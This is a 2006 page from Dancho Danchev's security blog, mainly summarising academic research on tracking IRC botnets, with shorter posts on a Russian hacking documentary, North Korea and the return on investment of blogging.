Dancho Danchev's Blog - Mind Streams of Information Security Knowledge

In the overwhelming sea of information, access to timely, insightful and independent open-source intelligence (OSINT) analyses is crucial for maintaining the necessary situational awareness to stay on the top of emerging security threats. This blog covers trends and fads, tactics and strategies, intersecting with third-party research, speculations and real-time CYBERINT assessments, all packed with sarcastic attitude

Monday, October 16, 2006

Observing and Analyzing Botnets

Informative and rich on visual materials, research presenting a "A Multifaceted Approach to Understanding the Botnet Phenomenon"

"Throughout a period of more than three months, we used this infrastructure to track 192 unique IRC botnets of size ranging from a few hundred to several thousand infected end-hosts. Our results show that botnets represent a major contributor to unwanted Internet traffic—27% of all malicious connection attempts observed from our distributed darknet can be directly attributed to botnetrelated spreading activity. Furthermore, we discovered evidence of botnet infections in 11% of the 800,000 DNS domains we examined, indicating a high diversity among botnet victims. Taken as a whole, these results not only highlight the prominence of botnets, but also provide deep insights that may facilitate further research to curtail this phenomenon."

Botnets' security implications are often taken as a phenomenon, whereas this is not the case as distributed computing concepts have been around for decades. Some interesting graphs and observations in this research are :

- Breakdown of scan-related commands seen on tracked botnets during the measurement period
- The percentage of bots that launched the respective services (AV/FW Killer) on the victim machines
- Distribution of exploited hosts extracted from the IRC tracker logs

What botnet masters will definitely optimise :
- disinformation for number and geolocation of infected hosts
- alternative and covert communication channels compared to stripped, or encrypted IRC sessions
- rethink of concept of performance vs stealthiness
- rethinking how to retain the infected nodes, compared to putting more efforts into infecting new ones
- for true competitiveness, vulnerabilities in anti-virus solutions allowing the code to remain undetected for as long as possible
- synchronization with results from popular test beds such as VirusTotal for immediate reintroduction of an undetected payload

The future of malware stands for solid ecosystem and diversity, whereas, both, researchers, the Pentagon, and malware authors are actively benchmarking and optimising malware, each having seperate objectives to achieve.

Go through a previous post "Malware Bot Families, Technology and Trends" in case you want to find out more about botnet technologies, and update yourself with the most recent case of DDoS extortion.

Dancho Danchev

Independent Security Consultancy, Threat Intelligence Analysis (OSINT/Cyber Counter Intelligence) and Competitive Intelligence research on demand. Insightful, unbiased, and client-tailored assessments, neatly communicated in the form of interactive reports - because anticipating the emerging threatscape is what shapes the big picture at the end of the day. Approach me at dancho.danchev@hush.com

Sunday, October 15, 2006

North Korea's Wake-up Call

"Hey Dick, do you know what time it is? It's Time to Bomb Kim Jong!"

Dancho Danchev

Saturday, October 14, 2006

Hunting the Hacker - Documentary

Here's a recently released documentary -- in Russian -- entitled "Охота на хакера", or Hunting the Hacker, discussing IT security, cyber crime, malware authors, onlie scams etc. It also features Eugene Kaspersky commenting on various trends. Don't forget, Russian hackers and Eastern European ones are not just responsible for the sky-rocketing cyber-crime cost "projections", but for the global warming effect as well. I often come across biased comments on wrongly structured research questions such as : "Who are the best hackers in respect to nationalities?", where it should have been formulated as "How vibrant is the IT security landscape, so that the changing dominance lifecycle of a nation could be measured at a particular moment in time?"

True hackers don't have nationalities, they're citizens of the world. Download or stream it from Google Video.

Dancho Danchev

Thursday, October 12, 2006

The Return on Investment of Blogging

What's the return on investment (ROI) of blogging? Blogging for dollars is happening already, whereas this great post by Charlene Li emphasises on many more qualitative benefits and ways of measuring their progress, or slowed down performance :

"My colleague, Chloe Stromberg, and I have been interviewing companies about how they measure ROI and realized that we needed to throw the net wider – this is where you come in! The working idea is to create a framework for measuring the ROI of external blogging efforts for medium- and large-sized companies. Below is an outline of ingredients for the framework. Please help us by fleshing out sources, providing examples, and adding/editing our ROI factors – feel free to add comments to this post or to email us directly (if you’d prefer, we’ll keep specific numbers and examples confidential and use them only as background)."

What's my initial investment? It's time, and time doesn't really mean money, it means opportunities.

My ROI factors :
- visitors' retention
- blog stickiness
- average time spent
- echo-effect
- improved networking, communication with colleagues, friends, and of course, ordes of hypocrites
- successfully reaching, retaining, and informing predefined audiences
- differentiated content channel, barely links posting only
- third-party syndication
- self-preservation and self-awakening
- setting the foundation for my successful identity upload and immortality into cyberspace?

Cloud courtesy of the main blog index and density of the keywords.

Dancho Danchev